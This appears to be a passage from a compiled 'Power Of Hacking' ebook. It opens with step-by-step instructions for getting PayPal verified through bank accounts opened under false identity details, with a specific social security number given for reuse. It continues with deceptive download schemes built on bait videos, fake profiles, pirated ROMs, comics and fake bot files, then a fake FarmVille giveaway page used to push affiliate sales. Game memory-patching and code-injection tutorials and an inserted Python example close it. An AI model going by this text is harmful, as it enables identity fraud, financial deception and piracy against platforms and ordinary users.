Can I resell your guide? No, definitely not. You wouldn't want this guide to be exposed and PayPal will find out, just like how PayPal caught a lot of individuals using Netspend.

What are the requirements to becoming successful in this method? You will need:
- A social security number [doesn't need to be yours, just find a working one, the SSN will

only be used once. Hey, use this number and just change up the last digits 559-44-3632]
- A lot of Netspend accounts [This shouldn't be a problem. Just create a lot of Netspend accounts or you can just use one for yourself. It doesn't matter, it's according to how many banks you want created]. You can download some valid US addresses here http://uploading.com/files/15f32392/Valid_Addresses.txt/ (note: some addresses are already taken, you can just change the street address's last 2 digits).
- Must understand well. Most of you already know about this; you must understand every detail of this guide because it's very simple.

Let's start!

Step 1- Firstly, we are going to create our main bank account. Go to https://www.usaa.com/inet/ent_logon/Logon
Step 2- Join usaa
Step 3- Fill in some legit-looking info (doesn't have to be yours)
Step 4- After you click next, choose no for both then hit next again
Step 5- Put in a valid US address then hit next.
Step 6- Create your own online id, password and pin. Please save your information in a notepad or something. Note- Put online ID in capital letters
Step 7- Read their online agreement and click I agree (Don't have to read it lol)
Step 8 - Create your own security questions and answers (Please save this important info)
Step 9 - Verify your info and hit submit.
Step 10- Go to products and Services now

Step 11- Scroll down the page and click "Savings"
Step 12- Click "Open an account"
Step 13 - Click "Get started"
Step 14- Choose "Savings" option.
Step 15- Choose yes for physical address option and click next
Step 16- Choose "Do not deliver my documents at usaa.com" then press next
Step 17 - Click the transfer funds option and click use another account
Step 17.1 - Click "Savings" as account type, click yes for signature authority, enter your netspend account and routing number, choose a nickname and click next
Step 18- After clicking next, click submit
Step 19- Put in $27 and click next
Step 20- Tick the 3 boxes above, choose yes below and click submit
Step 21 - View your info and click submit
Step 22 - Bingo! Now go to "my accounts"
Step 23 - Click the account you just made
Step 24 - Now look at your sexy new account and routing number. Add your info to your Paypal account and automatically get verified

How To Get PayPal Verified Now?

1. Go to PayPal.com
2. Login
3. Hit the "Get Verified" link
4. Choose "Add Bank"
5. Add in details: Bank Name - usaa bank; Account type - Savings;

Page 123


Power Of Hacking速 Account numberRouting number6. Then click next. 7. Click "Confirm Instantly" 8. Fill in your details and hit confirm instantly9. Congratulations! You are now PayPal Verified Username: xC0D3Rx Terms: DO NOT RE-SELL OR DISTRIBUTE WITHOUT MY PERMISSION. DO NOT LEAK THIS GUIDE INTO THE PUBLIC AS IT WILL END THE SAME AS NETSPEND DID AND NO ONE WILL BE ABLE TO GET VERIFIED ECT. AND LOTS WILL BE CAUGHT OUT. Dominating ShareCash! ShareCash is a site much like Uploading.com as it allows you to upload files and then pays you as you get others to download your files. The difference between ShareCash and other sites is that ShareCash will pay A LOT more. ShareCash pays 300 to 600 dollars for every 1,000 downloads, where Uploading.com pays around 5 dollars for every 1,000 downloads. What I am going to show you right now is how you can grab a hold of ShareCash and make AT LEAST 50 dollars a day from it! So first if you have not yet done so, go over to www.sharecash.org and sign up for an account. There is no fee to sign up and it takes a few minutes to do so. Now you should familiarize yourself with the site so take a good 5 minutes or so to look around. Note the Upload button on the side, that is where you will go to Upload your files. THE METHODS! Now I have spent some serious time developing these methods and making them work. Some are quick and easy and will bring some good cash while others will take more time, Mail:mtahirzahid@yahoo.com

Page 124


Power Of HackingŽ but will bring unbelievable cash! Method 1: Youtube This is an easy way to get started. People will download anything from youtube. So to get started make sure you have an account with youtube. Next go over to daily motion and find a good strip tease video where the girl gets naked at some point in the video. Download the video from daily motion using www.keepvid.com and fire up windows movie maker. The idea is that we want to post the video up to the point where it becomes obvious that the girl is about to show off some skin (boobs or bottom half) and then we cut the video right there. Now what your going to do is upload the cut portion to youtube. Since there is no actual nudity in this video (since you cut it out) youtube will not take the video down. Upload the entire video to sharecash and put the link in the description box next to your video. Give the video a long sexy name and watch as people download the entire video from your link in order to see the girl naked! Tons of people search for girls on Youtube so your videos will get plenty of views very fast. Method 2: Orkut and Myspace method Signup to yahoo and myspace account. Make around 300-400 friends on them. It will take little bit of time but you can do it easily if you spend around 1 hour daily on that and add around 50 persons a day. Its not so easy but its not even so hard. I got around 500 friends within two weeks. Most important thing: Concentrate only of UK, US and Canada people because sharecash only pays for these countries signups. It would be much easier for you if you join US and UK communities. If you are comfortable then try to make your profile by a girl’s name. Mostly people add a girl more commonly than a guy.

After creating an ID with 400-500 friends, add your uploaded pic to your profile or update your status. For example: Create a notepad file. Cloak it with your sharecash link and add it to your profile. Encourage people to download your file by saying that this is your phone number, the coolest or sexiest pic of yours, or be wilder, like "this is my nude cam show, download it". There will be many hornies there to download your stuff. Update your profile daily and keep on adding more US and UK friends.

Method 3: Forums are your friend!

Ahh yes, forums, my favorite place to get downloads from. So what we're gonna do for this method is find any porn forum and copy a few porn passwords that people post up. If you just look around at a few places like http://forum.dumpstersluts.com/ you'll find a few passwords. Now go ahead and copy those passwords into a text document and archive it with winrar. Here's where we're going to do things a little differently. Most people will go and outright post these files on the forums with your download link. Now this will bring in a few bucks, but when the passwords run out or someone sees a few postings about how they already use these passwords, your thread is pretty much dead. Instead you're going to sign up to as many porn forums as you can and place your download link in your signature with anchor text such as "Free GangBros Passwords." Then just post all over the place saying things like "Wow nice video" or "Thanks for the videos", stuff like that, so people will see your name and signature. If the forum will not allow your download link in the signature, just make a free blogger blog with the download link on there and have your signature redirect them there with the same anchor text. You will see huge traffic with this method, trust me, everyone wants free porn passwords!

Method 4: Roms and Emulators

Page 126


Power Of Hacking速 This is my biggest money maker by far, and its actually pretty easy to set up. The only reason that this is the most advanced method is because it requires a few things such as a website, hosting and some experience in creating a website and making it look decent. If you can make this method happen you will see a huge amount of downloads come through. What you do is search for nintendo ds roms and emulators in google. Now when you find a good site just download as many as you can. I use a few sites to download ds roms, but starting up I just went to mininova and downloaded a huge file with like 100+ ds roms. This got my site off the ground much faster and took the hassle out of downloading a 100 or so files seperately. Just upload all the files to sharecash seperately and post them on your new website. If you keep your site updated with new releases you can get a couple thousand downloads in a day easy. If you submit your site to any of the top 100 Rom lists you can get some awesome traffic that way. Altermatively you can submit to digg and reddit claiming that you've found the best DS Rom site on the web. Just remember to put a disclaimer on your site stating that all roms downloaded need to be deleted within 24 hours unless the legal copy is owned. That statement will keep your rom site legal so dont forget it! Method 5: Digital Comics Digital Comics are very popular on the web currently, and no one is using sharecash to promote online comics. There are a few things you can do here. For one you can visit http://www.lorencollins.net/freecomic/ and download a few comics and then post them on a blogger blog. Of course digg traffic works well here since comics usually cost money to download online. Another way to explode this is to use a site called 4chan.org. Now what you do is visit the comic section pick a comic book you downloaded and post the front cover and then next to that post the download link. 
A small description will help with this and get a couple people commenting on it. Again everyone loves free comics and 4chan is a great place to get your comics downloaded. Mail:mtahirzahid@yahoo.com

Method 6: Exploit Laziness

This is probably my favorite method just because it's actually very creative. What you need to do is go to any manual traffic exchange (look on google, you'll find a ton) and sign up to a few. Upload a large picture or any small program that is about 1 to 2 megs in size and name it "Traffic Exchange Bot." Make a quick blogger blog and delete everything from the page except for the post and title. Make the title large and the body easy to read. State that you have a free traffic exchange bot that they can have to use for the traffic exchange they are on. You can customize the page and make one for each traffic exchange you use. People will download the file hoping for a bot; even if you don't have a bot for them to download, once they download the file and see that it's not a bot they will more than likely just move on with their traffic exchanging, while you just got a download out of it! Make sure you .rar the file that you upload so it appears believable. You can participate in the exchange to get credits or just buy some; either way you will get conversions easily, since everyone hates having to do manual traffic exchanges.

Method 7: Current Blackhat Niche Method: Michael Jackson of course!

Download a dramatic looking picture of Michael Jackson (a close up of his face or whatever) and edit the photo by placing a caption of a quote and his life span (1958-2009 or whatever). Throw up a blogger blog saying everyone should pray for Michael Jackson and download this picture and put it as the background for their computer. There are way too many nuts out there for this not to work! Put a link to it on digg and reddit with a title saying something like "Support Michael Jackson's family, download this picture and place it as your background. Pictures honoring the king of pop". Just remember to make your title as long as possible and you'll be fine!

Method 8: Take help of websites or blogs

This is the simplest method and yet the most reliable. If you have a good website which gets around 1K-2K visitors per day, then create a simple banner and cloak it with your sharecash URL. Try to give away free ebooks related to your niche. People just love free stuff. For getting a free ebook or something you can simply search on google, rewrite the whole content and then go. If you want to be a bully then simply copy-paste that method and give it away for free. Ask your friends to place your free-stuff cloaked banner or URL on their websites or blogs.

Method 9: Make your website or blog especially for sharecash

People just love free stuff. When you start getting some decent money from sharecash, just invest in buying a domain and hosting and make a website dedicated to downloading free stuff. SEO it regularly, or to improve traffic always do yahoo answers posting along with a link back to your website. Just don't spam them, otherwise you will be punished.

Conclusion

That's all for Sharecash Domination. I hope you enjoyed this report, now get out there and make it happen! With these methods it'll be hard to not make $50+ a day unless you just don't take action! So now's the time to take action!

Would you like to make a lot of Money With FaceBook?

With this method, you will be able to make 100$-1000$ a day! Farmville is the secret of this method! In total, there are more than 80 000 000 farmville users in the world! This is why it is so simple to make money! What I will tell you today is how to make money with Farmville!!!

At first, you will need to create a Facebook Fan Page! For this, please go to: http://www.facebook.com/pages/

Then, please click on create a page:

Then, please click on Brand, Product, or Organization:

And choose the category you want! On the "Name of the page", please use your imagination!!! Example of title:

1) GET 100 FV CASH NOW – JUST BY JOINING THIS GROUP!!!
2) GET A SECOND CHICKEN COOP IMMEDIATELY!
3) GET A DOG IN YOUR FARM NOW!!!
4) FARMVILLE CHEATS – GET YOUR VILLA FOR FREE NOW!!!
5) Etc… Use your imagination!!!! :):):)

- Now click on "Create Page" at the bottom of the page! When you are in your facebook page, please click on the change picture button!

For example, if your fanpage is about dogs in farmville, you should put a farmville dog picture!!! Right after, you will need to click on the "Info" button and then click on "Edit Information".

1) In the "Founded" box, please write: 2010
2) In the "Website" box, write nothing
3) In the "Company Overview" box please write:

HOW DOES IT WORK: Follow the simple steps below to get a Rooster and a second chicken coop (Bonus) completely free:
Step 1 - Become a member of this group to be able to send the invitation. Just click on JOIN beside the picture.
Step 2 - Send the invitation to all of your friends. Click on the "Suggest to Friends" link on the left (below the farmville image) and let the verification process work.
Step 3 - You will receive the Rooster + the chicken coop (Bonus) after the verification process.

After these changes, it will look like this:

Now it's time to write something about "Your FanPage". How to do this? Take a look at this image!

In this field, please put:

HOW IT WORKS!!!
- Step 1 - Become a member of this group
- Step 2 - Send the invitation to all of your friends. Click on the "Suggest to Friends"
- Step 3 - Wait for the verification process!

Now you will need to edit your page!

1) Edit the wall settings

2) Uncheck "Fans can write or post content on the wall"

Final step: publish your page if it is not already done! Now we are at the second part, the easier part :) Go to http://www.FvHelper.Com and click on the affiliate program at the top right of the page!

After this, you will need to enter the correct information here:

When this is done, you will be an affiliate of a Farmville Bot! What does it mean? It means that you will make business by promoting your affiliate link with your facebook fanpage! In the affiliate section, there is your Affiliate link. Each time that someone goes to this link and buys your product, it will generate you 1,28$.
- If you make more than 200 sales/week, it will generate you 1,61$/sale
- If you make more than 400 sales/week, it will generate you 1,93$/sale
- If you make more than 750 sales/week, it will generate you 2,25$/sale

Imagine if you have a facebook fan page with 500 000 members! This will generate you more than 200 sales a day, trust me, it works! Now you are at the step where you need to get more members in your fanpage! Invite all your friends to your new group, tell your friends to invite their friends to your group!!! When your group exponentially reaches a lot of members,

promote your link!!! Publish this in your fanpage:

===
yourlink
Howdy Farmers! Tired of making thousands of clicks per day to manage your farm? With farming extreme manager, that's a thing of the past! This amazing program can automatically harvest your farm, animals and trees in one click (and even while you're away)! EXTRA: It will also help you fertilize every neighbor, win every ribbon and win up to 100 thousand exp points per day! Don't miss this exclusive and limited opportunity. Get farming extreme manager today: yourlink
===

===
yourlink
Dear farmers, thanks for all the compliments! We are proud to announce that Farming Extreme Manager is now being used by more than 200 thousand farmville fans! If you don't know about it, with farming extreme manager you can automatically:
- Harvest your farm, animals and trees in one click!
- Help and Fertilize every neighbor and win other ribbons
- Levelup Tricks to win up to 100.000 exp points per day
Unleash the true power of farmville. Get your copy today: yourlink
===

Don't forget to attach your link to the post (you can change the image, there are two options: one is the application screenshot, the other is the pig. The pig usually sells better). You can also, instead of attaching a link, attach a picture! Each Sunday, if you have more than 10$ in your affiliate balance, you will receive an affiliate payment in your paypal! This guide took me a lot of hours to make and I'm sharing this method with you for free! Enjoy it!!

Reveal ***** (Asterisk) Passwords Using Javascript

Want to reveal the passwords hidden behind asterisks (****)? Follow the steps given below:
1) Open the login page of any website (e.g. http://mail.yahoo.com).
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);
4) As soon as you press 'Enter', a window pops up showing the password typed by you..!
Note :- This trick may not work with Firefox.

How To Rename Your Recycle Bin

1. Click Start / Run
2. Type regedit and press enter.
3. Open the HKEY_CLASSES_ROOT folder
4. Open the CLSID folder
5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
6. Open the ShellFolder folder

7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed, change the "CallForAttributes" dword value to "0x00000000" (double-click and change the value data to 0). You must change both of these values to get the rename to appear.

After performing the above steps you will be able to rename the icon like any other icon. Right-click the Recycle Bin icon on the desktop, click Rename, and rename it to whatever you wish.

Game Training Tutorial #1

Tutorial Nr. 1 Standard Game Training: Learning how to hack games.

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

Awem Blade Master v1.0

http://www.awem.com/blade_master/

This is #1 in a series of tutorials ... from hacking static addresses up to advanced game hacking.

Note, that this is a tutorial for beginners. People who already have experience in game training should skip this and continue with the next one.

What we will learn: In this tutorial we will learn how to search for exact values and work with static addresses.

Our target is a game called Blade Master. There are more and other games for which I could have done a tutorial, but Apache- gave me the idea of using this one, so I agreed, because it's a shareware game (that means you do not have to pay for it :P) and it's easy to train (especially for beginners).

LET'S GET IT ON

Start the program TSearch. This is our so-called ‘Memory Searcher’. With this program we are able to find an ‘Address’ in our game which is holding, for instance, our Life ‘Value’.

Now run our target game Blade Master. Start a New Game and choose Mission 1. As you can see in the lower right corner, we have 3 Lives. So after we have died the 3rd time, we would see a nasty screen telling us that we are Game Over. But of course we want to have infinite lives, to play the whole game without this stupid screen popping up.

Pause the game and press Alt-Tab to go back to TSearch. In TSearch click Open Process and then on blademaster.exe. You have now chosen the process which you want to hack, so let's start:

STARTING THE FIRST SEARCH

Click on the magnifying glass to start a new search. As we all know, 3 is an exact value, so we will use the search for an ‘Exact Value’. We have 3 Lives and that's the ‘Value’ we want to find.

We know that 3 is less than 255, so we make a search for a ‘1 Byte’ value. Start the search. Well, after my first search I have found almost 300,000 addresses.

We could of course try to change them all to 20 or whatever, but the game would most probably crash, if we do so, not to mention that it would take much time :P

What we have to do now is search for our lives again, but with another value than 3 ... ok, let's go back to the game and lose all your Health until you die. Our life value has now decreased by 1, so we have a total life amount of 2. Pause the game again and go back to TSearch. As you know, we have just searched for 3 lives and TSearch has found all addresses which could be our life address. So let us search for 2 now. Click on the magnifying glass with the three ...'s.

Hmm, still too many addresses left, don't you think? Let's lose another life. Search for 1 in TSearch. Well, 11 addresses left here, but we have another life which we could lose, so after an enemy has killed you again and you have 0 lives left, search for it.

Okay, 2 addresses left. Now we still have to kill one of these two addresses. Abort your Mission and start it again, so that you have 3 lives again, and you will most certainly see the correct address we need in TSearch. Here it's 1196FDC ... double-click it to transfer it to the right (to the CheatTable) of TSearch. My TSearch screen would now look like this:

DESCRIPTION   ADDRESS   VALUE   TYPE
Lives         1196FDC   3       1 Byte

But well, we have only 3 lives and these are definitely not enough. There are now 2 ways to get infinite lives. The first and easiest would be to ‘Freeze’ the value in address 1196FDC.

STARTING THE FIRST ‘HACK’

Do you see the square to the left of the description Lives? Click it and a green face will appear. This means that you have frozen the value and it will not change, even if you are losing a life. Go back to the game and try it ... you will see that you always have the same amount of lives left which you have frozen.

The other way would be to set the life value to 50 or 99 or maximal 255 (because we've set it to 1 Byte). Well, I know you will not have ‘infinite’ lives then, but if 255 is still not enough for you, you can change the Byte Type to 4 Bytes and then change the value to 999.999.999 ... I think that should be enough :P

THE END

Well, as you of course know, these are ‘Static’ addresses. This means that the addresses will not change when you start a new level or restart the game. What you can do now in TSearch is save the Cheat File, and when you want to play the game again, you can load it and you will still have the correct life address.

Well ... I think this is the end of the tutorial. As I said, this is only basic stuff, but this is what it's supposed to be, coz it's for beginners :P I hope you have managed everything and learned from it.

I now suggest you download a few more shareware games and try to hack them. This will give you the general idea of how to make easy hacks and find the correct addresses, etc.

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid contact me on -->

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to Apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1ndphuck, Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of the tutorial is exactly the same as the one available on http://mtahirzahid.blogspot.com

Game Training Tutorial #2

Tutorial Nr. 2 Standard Game Training: Learning how to defeat DMA - the easy way

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

Alien Abduction v1.2.0.0

http://www.reflexive.net/

What we will learn: In this tutorial we will learn, how to search for unknown values and defeat Dynamic Memory Allocation (DMA).

Our target is a game called Alien Abduction. This game is very good for us to train on, coz it's using a fuel bar and DMA.

WHAT IS DMA?

As you may have noticed, there are games which change their memory locations. That means that when you have found the address for lives and restart the game, the address has changed.

Some games (nowadays almost every game) are using this method and every time you load the game or restart it, the game will give the memory locations to another available slot of memory. When you have restarted the game, you will have to make the search again, coz your old address is as useless as a second asshole :P But don't worry ... there is a way to get around this problem.

But keep in mind, that we are not able to change the allocation of the memory. What we have to do is to find the correct game code, which is for example decreasing our Health/Life and stop it from executing.

THE DEBUGGER

I know that there are more and better debuggers available, but we will use TSearch's. It's free, it's easy to use and I think not everyone has the money to buy SoftIce (or should I say: not everyone has ‘access’ to it :P ). We could also use OllyDbg, but I think for easy things like this, TSearch is suitable.

UNKNOWN VALUES

An unknown value is a value which we can't see at all. Example: when we run the game Alien Abduction we see that we have 3 Lives. This is a known value because it is an exact digit.

But when we look at the fuel in the game, we see that there isn't a given value but a fuel BAR. So when we have 100% fuel the value ‘could’ be 100 or 17902 or whatever, but we don't know it for sure.

THE SEARCH FOR THE UNKNOWN VALUE

This search method will obviously take a bit longer than the search for exact values, because with this search we will search for ALL addresses in the memory. Start TSearch and run the game. Once you have started a new level, pause the game and go back to TSearch. Select the process AlienAbduction.RWG (Reflexive Arcade games are almost always using this type of file). Start a new search for an unknown value, Type: 4 Bytes.

After the search go back into the game, unpause it and watch the Fuel Bar decreasing. After it has decreased a few mm, pause the game again, go back to TSearch and continue the search with ‘Has decreased’ because we have just seen our fuel decreasing.

Some games are using different routines. On the game American McGee's Scrapland, for instance, I spent almost 2 hours searching for the Infinite Ship Boost hack, until I had the idea of searching the other way round. So when the Ship Boost had decreased I had to search for ‘has increased’, etc. … and it worked perfectly ;)

Anyway ... after the first ‘has decreased’ search, go back to the game, let the fuel decrease again and search again. You will notice that this search method takes a few minutes. To make it easier, you can also use the search for a value which has ‘not changed’.

You should do it like this: after the search for ‘has decreased’, go back to the game but do NOT resume it. Then (without doing anything) go back to TSearch again and search for a value which ‘Has Not Changed’. This search would kill more addresses if you resumed the game, flew around a bit and killed a few enemies, but unfortunately the fuel will instantly decrease when you resume the game.

Note, that you should always be careful that no enemy kills you, coz after you died, the memory will already be allocated to another location.

Ok, I have now 18 addresses left. To kill the other ones, the only thing I need is to have a look at them :P There are addresses which are ‘linked’ together, for example 496D0B, 496D0C, 496D0D, 496D0E (in this case 496D0E would be the ‘master’ address). When I change the value of address 496D0E, the linked addresses will change their values too. Here there are only 3 bunches of those addresses (note that this is not the same in every game). Transfer all these ‘master’ addresses to the CheatTable and freeze them one after another; after you have found the correct one, delete the others.

My fuel address is 93F5536 with value 214234 (your address will be different with 99.9% certainty, but the value will probably be in the same range). After changing the value a bit I saw that the maximum value of fuel is 214331.
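The two searches described so far (Tutorial 1's exact-value narrowing as the lives drop, and the unknown-value search above with its ‘has decreased’ and ‘has not changed’ rounds) as an added Python example that is not part of the tutorial and not TSearch's code: it runs the same narrowing over a constructed 4 KiB buffer standing in for process memory, with made-up offsets and decoy fields, and shows why the unknown-value search leaves ‘linked’ runs of neighbouring addresses.

```python
import struct

# Byte widths TSearch offers, as struct formats (unsigned, little-endian)
FMT = {1: "<B", 2: "<H", 4: "<I"}

def read(mem, addr, width):
    """Read an unsigned little-endian integer of `width` bytes at `addr`."""
    return struct.unpack_from(FMT[width], mem, addr)[0]

def write(mem, addr, value, width):
    """Write `value` as a `width`-byte little-endian integer at `addr`."""
    struct.pack_into(FMT[width], mem, addr, value)

def scan_exact(mem, value, width):
    """First search for a known value: every offset (aligned or not) whose
    `width`-byte integer equals `value`, with the value recorded for later rounds."""
    return {a: value for a in range(len(mem) - width + 1)
            if read(mem, a, width) == value}

def scan_unknown(mem, width):
    """First search for an unknown value: remember every offset and what it holds."""
    return {a: read(mem, a, width) for a in range(len(mem) - width + 1)}

def refine(candidates, mem, width, keep):
    """Follow-up search (the magnifying glass with the three dots): keep a candidate
    only if keep(old, new) holds for its recorded and current value, and record the
    current value for the next round."""
    survivors = {}
    for addr, old in candidates.items():
        new = read(mem, addr, width)
        if keep(old, new):
            survivors[addr] = new
    return survivors

# Comparison modes of the follow-up search
def has_decreased(old, new):   return new < old
def has_increased(old, new):   return new > old
def has_not_changed(old, new): return new == old
def exact(value):              return lambda old, new: new == value

def linked_groups(addrs, width):
    """Cluster candidates that lie within one value-width of each other: unaligned
    windows over the same bytes move together (the 'linked addresses' effect), so
    freeze one address per group to find the real one."""
    groups = []
    for addr in sorted(addrs):
        if groups and addr - groups[-1][-1] < width:
            groups[-1].append(addr)
        else:
            groups.append([addr])
    return groups

# Constructed process image (not a real game): made-up offsets stand in for the
# tutorial's 1196FDC (lives) and 93F5536 (fuel), plus decoys that behave like the
# unrelated addresses a real search has to eliminate.
LIVES, FUEL = 0x2F0, 0x7A4
MISSION, ENEMIES, TIMER, RECORD, ANIM = 0x100, 0x400, 0x800, 0x900, 0xA00

def build_memory():
    mem = bytearray(0x1000)
    write(mem, LIVES, 3, 1)          # what the HUD shows as "3 lives"
    write(mem, FUEL, 214234, 4)      # the fuel bar; its number is never shown
    write(mem, MISSION, 3, 1)        # mission number 3: never changes
    write(mem, ENEMIES, 3, 1)        # enemies alive: happens to fall with the lives
    write(mem, TIMER, 5000, 4)       # level timer: only ever decreases, like fuel
    write(mem, RECORD, 214234, 4)    # best-fuel record: same value as fuel, constant
    write(mem, ANIM, 9000, 4)        # animation countdown: keeps ticking while paused
    return mem

def find_lives(mem):
    """Tutorial 1: 1-byte exact searches for 3, then 2, 1, 0 as the player dies,
    then 3 again after the mission is restarted. Returns the surviving offsets."""
    cands = scan_exact(mem, 3, 1)
    for lives in (2, 1, 0):
        write(mem, LIVES, lives, 1)
        write(mem, ENEMIES, lives, 1)      # the decoy tracks the lives for a while
        cands = refine(cands, mem, 1, exact(lives))
    write(mem, LIVES, 3, 1)                # abort the mission and start it again
    write(mem, ENEMIES, 5, 1)              # ... but the enemy count now differs
    cands = refine(cands, mem, 1, exact(3))
    return sorted(cands)

def find_fuel(mem):
    """Tutorial 2: 4-byte unknown-value search, 'has decreased' twice while flying,
    then 'has not changed' while the game stays paused. Returns surviving offsets."""
    cands = scan_unknown(mem, 4)
    for fuel in (214000, 213500):
        write(mem, FUEL, fuel, 4)
        write(mem, TIMER, read(mem, TIMER, 4) - 37, 4)
        write(mem, ANIM, read(mem, ANIM, 4) - 250, 4)
        cands = refine(cands, mem, 4, has_decreased)
    write(mem, ANIM, 7777, 4)              # paused: only the animation still ticks
    cands = refine(cands, mem, 4, has_not_changed)
    return sorted(cands)

if __name__ == "__main__":
    print("lives:", [hex(a) for a in find_lives(build_memory())])
    fuel = find_fuel(build_memory())
    print("fuel :", [[hex(a) for a in g] for g in linked_groups(fuel, 4)])
```

The fuel search ends with two bunches of four neighbouring addresses, the fuel's own and the timer's: the unaligned windows next to a 4-byte value shrink together with it, which is exactly the ‘master address’ situation described above.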

Well, as we know this address will change as soon as we restart the game. Now we need our debugger.

USING THE DEBUGGER

At the top of TSearch click on AutoHack, in the drop-down on Enable debugger and after that AutoHack window.

Now go to the TSearch main screen and right-click the fuel address and choose AutoHack (at the bottom). We have now set a ‘Breakpoint’ (it’s a WRITE breakpoint, btw) on our fuel address. When we go back to the game and the fuel value is changing, we will see something popping up in the TSearch's AutoHack window:

ADDRESS   OPCODES        LANGUAGE
4138CF    D996A4000000   FST DWORD PTR [ESI+0xA4]

Do you see it? You have exactly the same code. That's because this is the GAME CODE. This code is on EVERY computer the same.

There are of course exceptions (more about them in another tutorial), but I can assure you 100% that this code will always be the same on any computer you are using (at least as long as you use the same game version). The question is now: how are we supposed to hack this value? There are no numbers we can write to get infinite fuel or to set the fuel value to max …

I will tell you what we have to do: We have to replace the instruction which is changing our Fuel (FST DWORD PTR [ESI+0xA4]) to something else, that isn't changing it.

Fortunately we have a friend called NO OPERATION (a.k.a. NOP). And our friend does exactly what he is called. When the game is executing the instruction which is changing our fuel and we have ‘nopped’ it, the fuel will not change.

NOP HACKS

As you know from the code above, FST DWORD PTR [ESI+0xA4] has 6 opcode bytes: D9-96-A4-00-00-00. We want to kill the whole instruction FST DWORD PTR [ESI+0xA4], so we have to kill ALL of its opcodes. The NOP opcode is 90, so we have to overwrite (poke) NOP 6 times into the instruction we want to kill. Back in the AutoHack window, right-click the line

4138CF    D996A4000000   FST DWORD PTR [ESI+0xA4]

and then ‘Nop This Line’. You will see 6 NOPs, one beneath the other. Go back to the game and resume it. Well done, you now have Infinite Fuel. You could also make this hack for Lives, Nukes, Crystals, etc.

THE REWARD

Now quit the whole game and run it again. Start TSearch, choose the process and click enable debugger and AutoHack window. There is a button in the AutoHack window called DIS or click on Edit and then on Disassemble. Write down the address 4138CF and you will see that its still there ;)

You have now learned how to make nop-hacks. With this knowledge you are able to defeat DMA on almost every game. As I have said earlier, this is only the easy way of how to defeat it. In the next tutorial you will learn how to do it with code injection.

Now I suggest you again to download other games and repeat what we have done. You should also start to learn assembler coz it is essential for our next tutorials, though I will explain a bit too. You should at least know what the different instructions like MOV, JMP (and all other JMP types), LEA, CMP, PUSH, etc. are doing.

Well then ... another tutorial finished. I hope you have managed everything and learned from it. Even people who already have loads of experience in game training are using this method to freeze values etc., so don't think this is only stuff for kids :P

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid or contact me on --> iRC: EFNET: #GAMEHACKING

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to Apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (in alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1ndphuck, Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of this tutorial is exactly the same as the one on http://mtahirzahid.blogspot.com

Game Training Tutorial #3

Tutorial Nr. 3 Standard Game Training: Learning how to defeat DMA – with code injection

Tools Needed: TSearch

http://mtahirzahid.blogspot.com

Alien Defense v1.0

http://www.reflexive.net

Sheep's Array of Sunshine v1.3

http://mtahirzahid.blogspot.com

What we will learn: In this tutorial we will learn how to defeat DMA with code injection.

Code Injection is used by advanced game hackers. The general idea is, that you jump out of the main game code to your OWN code and jump back, after your code has been executed. If you have good asm (Assembler) knowledge, you can do almost everything with it.

NEW TOOL

Today we will use Sheep's Array of Sunshine (a.k.a. SAS). With this little program, we can search our game code for unused locations, to inject our code.

It has quite a lot more functions, than you might think. You should read the included readme, to learn how to use this program and how to take advantage of it …

I’ve been using it since 2003 and I still hope that one day (hopefully in this century :P) sheep will update it.

START

The game we will hack today is called Alien Defense. It’s another little shareware game and perfect to learn how to inject code.

Also note that you should have learned the basics of asm by now. (I have warned you in the previous tutorial :P)

First thing we need to do is to find the Health value. We could hack Shield as well, but for this part we will use Health..

I think the search you have to do is completely clear... if not:

Start TSearch, run the game, begin a mission, select the process AD.RWG in TSearch and start the search for an unknown value.

Go back to the game, decrease the Health, search again; decrease the Health, search again; decrease the Health, search again; and search for has not changed, to save a bit time…

I have found the address 294C57E (yours will be different to 99,9%).

Now there are two ways we could do it ... The first would be to set a Memory breakpoint on the address, the second would be to set an Open breakpoint on it.

For this tutorial we will use the ‘normal’ Memory breakpoint ... we will see the advantage of the Open breakpoint in the next tutorial.

Now after you have found the correct address (the value should be in the range of 16384 and 17096 [depends on how much Health you have left]) set a breakpoint on it by enabling the debugger and right-clicking the address and AutoHack it.

I got:

ADDRESS    OPCODES   LANGUAGE
0040EDB3   D9597C    FSTP DWORD PTR [ECX+0x7C]

What we will try to do now is this:

ADDRESS    OPCODES   LANGUAGE
0040EDB3   D9597C    FSTP DWORD PTR [ECX+0x7C]   --> we jmp to 1
0040EDB6   8BE5      MOV ESP,EBP
0040EDB8   5D        POP EBP                     --> 2
0040EDB9   C20400    RETN 0x4
00xxxxx0             OUR CODE HERE               --> 1
00xxxxx4             OUR CODE HERE
00xxxxx8             OUR CODE HERE
00xxxxxC             JMP 0040EDB8                --> and after our code has been executed we jmp to 2

What we here do is: We jump from our main game code – 0040EDB3 – to our code cave – 00xxxxx0 (this 00xxxxx0 is only because we haven't grabbed our code cave yet) – then we inject our own code and after the code has been executed, we will jump back to the main game code.

Well, we have to find out which value we have to inject into [ECX+0x7C], right? Normally it would be 17096, because if you change your Health value to that, you would have full Health ... but not in this game.

We have to find out the address of the register (ECX) and then add 7C to it. To do this right-click on the line 0040EDB3 D9597C FSTP DWORD PTR [ECX+0x7C] in the AutoHack window and then on Register.

Now go to the Register tab (it’s to the right of the Thread tab). Once there, you have to choose the register ECX in the dropdown list. Then click on the square to the left of the window to activate it (you will see that it is activated by the red head that appears in the square).

